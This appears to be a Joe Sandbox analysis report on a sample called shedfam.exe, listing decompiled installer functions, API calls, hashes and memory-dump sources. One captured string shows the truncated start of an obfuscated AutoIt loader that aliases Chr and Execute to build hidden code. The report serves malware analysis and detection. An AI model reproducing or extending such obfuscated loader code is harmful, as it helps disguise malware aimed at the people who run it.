Part of subcall function 00404FE7: SendMessageA.USER32 ref: 00405095
Part of subcall function 00404FE7: SendMessageA.USER32 ref: 004050A3

Part of subcall function 0040555B: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422588,Error launching installer), ref: 00405580
Part of subcall function 0040555B: CloseHandle.KERNEL32(?), ref: 0040558D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E55
GetExitCodeProcess.KERNELBASE ref: 00401E65
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401E8A

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: 1a5498c97b03bf9ad2a802c144142cbddf4fe197977c824e4eb94680ac26f956
Instruction ID: f982a8a4b5a7b7f11f96eebada5615e554ddc2bd3b1688d6a113b967b57f1ffa
Opcode Fuzzy Hash: 1a5498c97b03bf9ad2a802c144142cbddf4fe197977c824e4eb94680ac26f956
Instruction Fuzzy Hash: 3C016D31D04104EBDF11AF91C945A9E7771EB40354F24813BF905B51E1C7794A81DB9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040365C Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040365C() {
				void* _t1;
				void* _t2;
				void* _t4;
				void* _t7;
				signed int _t12;

				_t1 =  *0x409014; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x409014 =  *0x409014 | 0xffffffff;
				}
				_t2 =  *0x409018; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x409018 =  *0x409018 | 0xffffffff;
					_t12 =  *0x409018;
				}
				E004036B9();
				_t4 = E00405620(_t7, _t12, "C:\\Users\\hardz\\AppData\\Local\\Temp\\nse13EA.tmp\\", 7); // executed
				return _t4;
			}

0x0040365c
0x0040366b
0x0040366e
0x00403670
0x00403670
0x00403677
0x0040367f
0x00403682
0x00403684
0x00403684
0x00403684
0x0040368b
0x00403697
0x0040369d

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,00403482,00000000), ref: 0040366E
CloseHandle.KERNEL32(FFFFFFFF,00000000,00403482,00000000), ref: 00403682

Strings

C:\Users\user\AppData\Local\Temp\nse13EA.tmp\, xrefs: 00403692

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\nse13EA.tmp\
API String ID: 2962429428-758263695
Opcode ID: ff0635daa02b02786d4c6060d7483ceeb15bee290bd1bd17e04d86e07ad0f233
Instruction ID: d9e8a33d28c15f53d2eb362b268636166e6a3abf7a8e9a4d7af1e4fffe66201b
Opcode Fuzzy Hash: ff0635daa02b02786d4c6060d7483ceeb15bee290bd1bd17e04d86e07ad0f233
Instruction Fuzzy Hash: 52E08C30900A10A6C230AF7CBE499553B189B41331BA04B26F638F22F2C3395E865AED

Uniqueness

Uniqueness Score: -1.00%

Function 004031D5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031D5(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x004031d9
0x004031ec
0x004031f4
0x00000000
0x004031fb
0x00000000
0x004031fd

APIs

ReadFile.KERNELBASE(?,00000000,00000000,00000000,Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655,0040B120,004030DA,Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655,00004000,?,00000000,?,00402F64,00000004,00000000,00000000), ref: 004031EC

Strings

Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655, xrefs: 004031D8

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: FileRead
String ID: Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655
API String ID: 2738559852-3096212848
Opcode ID: 0be395bbe571093c8e78859d05ee89954336de5599fe3087c5eab9dc4054fae4
Instruction ID: d6fbb751533e8173f5cb9bb8eb792094bbd109b1eecd8ff5b75a0af7a5988eec
Opcode Fuzzy Hash: 0be395bbe571093c8e78859d05ee89954336de5599fe3087c5eab9dc4054fae4
Instruction Fuzzy Hash: 77E08C32104118BBDF209F619C05EA73F5CEB053A2F00C037FA25E52A1D230EA149BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423fb0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42376c =  *0x42376c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42376c, 0x7530,  *0x423754), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32 ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: cbf58c645cd0bca2d3f8e9800932a6635a1f6a75dc97f939ce2f6e9f6cf97e13
Instruction ID: eb1965022be8e41d6b0e1b01d22ae835c185752925051d09dc6a9c457a4677e5
Opcode Fuzzy Hash: cbf58c645cd0bca2d3f8e9800932a6635a1f6a75dc97f939ce2f6e9f6cf97e13
Instruction Fuzzy Hash: 5B01F471B242119BEB195F389D04B2A36A8E750319F10813BF851F66F1D67CDC029B8D

Uniqueness

Uniqueness Score: -1.00%

Function 00406087 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406087(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409248);
				_t5 = GetModuleHandleA( *(_t10 + 0x409248));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40924c));
				}
				_t5 = E0040601D(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x0040608f
0x00406092
0x00406099
0x004060a1
0x004060ad
0x00000000
0x004060b4
0x004060a4
0x004060ab
0x00000000
0x004060bc
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
GetProcAddress.KERNEL32(00000000,?), ref: 004060B4

Part of subcall function 0040601D: GetSystemDirectoryA.KERNEL32 ref: 00406034
Part of subcall function 0040601D: wsprintfA.USER32 ref: 0040606D
Part of subcall function 0040601D: LoadLibraryA.KERNELBASE(?), ref: 0040607D

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 2602b990a6be508378c6e42cd022796474ee903161cb72c2cb5a68df28a06255
Instruction ID: 21d738a59780ab69202fff5272367df6aef59ea6a60bf168f6e21a2e897772da
Opcode Fuzzy Hash: 2602b990a6be508378c6e42cd022796474ee903161cb72c2cb5a68df28a06255
Instruction Fuzzy Hash: 0EE086326441106AD621DA749D0496B72AC9E84740702487EF906F6191D7389C219A6A

Uniqueness

Uniqueness Score: -1.00%

Function 004059D2 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004059D2(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x004059d6
0x004059e3
0x004059f8
0x004059fe

APIs

GetFileAttributesA.KERNELBASE(00000003,00402CCB,C:\Users\user\Desktop\shedfam.exe,80000000,00000003), ref: 004059D6
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059F8

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16

Uniqueness

Uniqueness Score: -1.00%

Function 00405526 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405526(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x0040552c
0x00405534
0x00000000
0x0040553a
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00403242,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 0040552C
GetLastError.KERNEL32 ref: 0040553A

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 62594c709cce2f5b8fb8ca5d54e7f3286412bfa0f130784d9dc04a2d264f0cc1
Instruction ID: ef4cf1633336d89bd9081ea15a94d355bc31ae876b4da9069c07bcdb8eac4916
Opcode Fuzzy Hash: 62594c709cce2f5b8fb8ca5d54e7f3286412bfa0f130784d9dc04a2d264f0cc1
Instruction Fuzzy Hash: 9DC08C30A08101BAD7100B30EE08B073AA5AB00340F104435A206E40F4D6349000CD3E

Uniqueness

Uniqueness Score: -1.00%

Function 004059B3 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004059B3(CHAR* _a4) {
				signed char _t3;
				int _t5;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
					return _t5;
				}
				return _t3;
			}

0x004059b7
0x004059c0
0x004059c9
0x00000000
0x004059c9
0x004059cf

APIs

GetFileAttributesA.KERNELBASE(?,004057BE,?,?,?), ref: 004059B7
SetFileAttributesA.KERNELBASE(?,00000000), ref: 004059C9

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 074f941138e9f1df105fff9ec0b177d36ae7deb3ea45ba36f2ce8c3e98632dd9
Instruction ID: 1a2f65c413df3ce73f95872002610f1c5d23223b0cff369f14e5668d8f4fdbee
Opcode Fuzzy Hash: 074f941138e9f1df105fff9ec0b177d36ae7deb3ea45ba36f2ce8c3e98632dd9
Instruction Fuzzy Hash: 3CC04CF1818641ABD6015B34DF4D81F7F66EB50321B108B35F169A01F0CB315C66DA1A

Uniqueness

Uniqueness Score: -1.00%

Function 00403207 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403207(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}

0x00403215
0x0040321b

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EB3,?), ref: 00403215

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 1fe8ad6970e23be315a08abdb90e0b058f57890677f29add635e0ec7003afc6f
Instruction ID: 89776e93a0172b97a38fb7948c015c90ed7fb14eba3da05579cbd58eb2c2bcc6
Opcode Fuzzy Hash: 1fe8ad6970e23be315a08abdb90e0b058f57890677f29add635e0ec7003afc6f
Instruction Fuzzy Hash: 87B01271644200BFDB214F00DF06F057B61A794701F108030B744380F082712830EB1E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405125 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405125(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423764;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004050B9, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405D1D(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x420580;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42374c == _t149) {
							ShowWindow( *0x423f88, 8);
							if( *0x42400c == _t149) {
								E00404FE7( *((intOrPtr*)( *0x41fd50 + 0x34)), _t149);
							}
							E00403F90(1);
							goto L25;
						}
						 *0x41f948 = 2;
						E00403F90(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040401E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423750, _t149);
						ShowWindow(_t154, 8);
						E00403FEC(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423f90;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423750 = GetDlgItem(_a4, 0x403);
				 *0x423748 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423764 = _t127;
				_v8 = _t127;
				E00403FEC( *0x423750);
				 *0x423754 = E00404889(4);
				 *0x42376c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403FB7(_a4);
				if(( *0x423f98 & 0x00000003) != 0) {
					ShowWindow( *0x423750, _t149);
					if(( *0x423f98 & 0x00000002) != 0) {
						 *0x423750 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403FEC( *0x423748);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423f98 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

0x0040512e
0x00405134
0x0040513d
0x00405140
0x004052d8
0x004052fc
0x004052fc
0x0040530f
0x0040532d
0x00405334
0x0040538b
0x0040538f
0x00000000
0x00405396
0x0040539e
0x004053a6
0x004053a9
0x004054a2
0x00000000
0x004054a2
0x004053b8
0x004053c4
0x004053ca
0x004053d0
0x004053e5
0x004053eb
0x004053d2
0x004053d7
0x004053dd
0x004053e0
0x004053e0
0x004053fb
0x00405403
0x00405406
0x0040540f
0x00405412
0x00405419
0x00405420
0x00405428
0x00405428
0x0040543f
0x0040543f
0x00405446
0x0040544c
0x00405455
0x0040545c
0x00405465
0x00405467
0x0040546a
0x00405479
0x0040547b
0x00405481
0x00405482
0x00405483
0x0040548b
0x00405496
0x0040549c
0x0040549c
0x00000000
0x00405406
0x0040538f
0x0040533c
0x0040536c
0x00405374
0x0040537f
0x0040537f
0x00405386
0x00000000
0x00405386
0x00405340
0x0040534a
0x00000000
0x00405311
0x00405317
0x0040534f
0x00000000
0x00405358
0x00405320
0x00405325
0x00405328
0x00000000
0x00405328
0x0040530f
0x00405146
0x0040514a
0x00405153
0x0040515a
0x0040515d
0x00405160
0x00405163
0x00405164
0x00405165
0x0040517e
0x00405181
0x0040518b
0x0040519a
0x004051a2
0x004051aa
0x004051af
0x004051b2
0x004051be
0x004051c7
0x004051d0
0x004051f3
0x004051f9
0x0040520a
0x0040520f
0x0040521d
0x0040522b
0x0040522b
0x00405230
0x0040523e
0x0040523e
0x00405243
0x00405246
0x0040524b
0x00405257
0x00405260
0x0040526d
0x0040527c
0x0040526f
0x00405274
0x00405274
0x00405288
0x00405288
0x0040529c
0x004052a5
0x004052ae
0x004052be
0x004052ca
0x004052ca
0x00000000

APIs

GetDlgItem.USER32 ref: 00405184
GetDlgItem.USER32 ref: 00405193
GetClientRect.USER32 ref: 004051D0
GetSystemMetrics.USER32 ref: 004051D8
SendMessageA.USER32 ref: 004051F9
SendMessageA.USER32 ref: 0040520A
SendMessageA.USER32 ref: 0040521D
SendMessageA.USER32 ref: 0040522B
SendMessageA.USER32 ref: 0040523E
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405260
ShowWindow.USER32(?,00000008), ref: 00405274
GetDlgItem.USER32 ref: 00405295
SendMessageA.USER32 ref: 004052A5
SendMessageA.USER32 ref: 004052BE
SendMessageA.USER32 ref: 004052CA
GetDlgItem.USER32 ref: 004051A2

Part of subcall function 00403FEC: SendMessageA.USER32 ref: 00403FFA

GetDlgItem.USER32 ref: 004052E7
CreateThread.KERNEL32 ref: 004052F5
CloseHandle.KERNEL32(00000000), ref: 004052FC
ShowWindow.USER32(00000000), ref: 00405320
ShowWindow.USER32(?,00000008), ref: 00405325
ShowWindow.USER32(00000008), ref: 0040536C
SendMessageA.USER32 ref: 0040539E
CreatePopupMenu.USER32 ref: 004053AF
AppendMenuA.USER32 ref: 004053C4
GetWindowRect.USER32 ref: 004053D7
